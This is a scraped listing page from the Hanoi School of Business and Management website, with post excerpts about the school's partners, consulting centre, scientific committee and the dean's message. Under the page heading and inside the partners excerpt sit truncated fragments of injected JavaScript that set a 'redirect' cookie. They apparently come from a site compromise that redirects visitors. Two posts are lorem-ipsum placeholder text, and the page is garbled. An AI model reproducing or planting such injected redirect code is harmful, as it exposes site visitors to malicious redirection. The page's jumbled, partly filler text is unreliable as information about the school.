Giới thiệu | Khoa Quản Trị và Kinh doanh - Đại học Quốc gia Hà Nội | Page 2

Hanoi School of Business and Management – HSB IN BRIEF en

{var U=(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’

By hsbadmin01 | Giới thiệu
DETAIL

Đối tác chiến lược

    Association of Asia-Pacific Business Schools  University of Applied Sciences and Arts Northwestern Switzerland  Carlifornia University, USA  Conferences of State Bank Supervisors (CSBS), USA      East Asia Consulting Group, Singapore  Sungkyunkwan University, Korea  Tuck School of Business  University of Hawaii at Manoa, USA  BIDV  The University of Queensland, Australia {var U=(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void […]

By hsbadmin01 | Giới thiệu
DETAIL

Trung tâm Đào tạo và Tư vấn doanh nghiệp ( HCC )

1. Giới thiệu Trung tâm Đào tạo và Tư vấn doanh nghiệp ( HCC ) – Khoa Quản Trị và Kinh Doanh (HSB) – Đại học Quốc Gia Hà Nội được thành lập với mục tiêu cung cấp các khoá đào tạo và dịch vụ tư vấn cho các nhà lãnh đạo cấp cao và […]

By hsbadmin01 | Giới thiệu
DETAIL

Iron theme

Elit natoque laoreet Nam nibh Mauris metus risus eget Sed tincidunt. Vel eget laoreet Vestibulum risus tempus dui porttitor Duis et vel. Interdum vel consectetuer rutrum diam In tempor cursus massa semper lacinia. Urna ipsum pede eros cursus vitae platea Vestibulum Curabitur eu nulla. Leo pretium semper tortor eros convallis Suspendisse. Vestibulum ac ante tortor […]

By hsbadmin01 | Giới thiệu
DETAIL

Green theme

Justo adipiscing nec sed Nam vel urna hendrerit porttitor pede platea. Massa Phasellus pretium justo habitant laoreet Nulla orci consectetuer laoreet nec. Nunc hendrerit at est Nam tincidunt eu Ut vitae enim ipsum. Mattis Nullam Phasellus purus fringilla vestibulum lacinia laoreet Ut et sed. Quisque nibh Ut Sed quis elit mi et convallis Phasellus. Nulla […]

By hsbadmin01 | Giới thiệu
DETAIL

Hội đồng Khoa học và Đào tạo – Khoa Quản trị và Kinh doanh

Hội đồng Khoa học và Đào tạo của HSB gồm những nhà khoa học liên ngành có uy tín và những nhà lãnh đạo và quản trị xuất sắc trên nhiều lĩnh vực kinh tế – xã hội. Các thành viên hội đồng đã và đang có đóng góp lớn cho việc hoạch định và […]

By hsbadmin01 | Giới thiệu
DETAIL

Hanoi School of Business (HSB) Training and Scientific committee

HSB TRAINING AND SCIENTIFIC COMMITTEE 2013-2018 Hanoi School of Business and Management (HSB) Training and Scientific committee includes prestigious interdisciplinary scientists and excellent leaders and executives in many socio-economic realms. Committee members are making great contributions to the planning and implementation of strategies for the sustainable development of HSB brand-name under Vietnam National University Hanoi. […]

By hsbadmin01 | Giới thiệu
DETAIL

Thông điệp của Chủ nhiệm Khoa

         Các bạn thân mến,         Sau 25 năm phát triển, Khoa Quản trị và Kinh doanh (HSB) – Khoa cấp trường thành viên trong mô hình Đại học Quốc gia Hà Nội (VNU) đã được công nhận là thương hiệu có uy tín hàng đầu tại Việt Nam, […]

By hsbadmin01 | Giới thiệu
DETAIL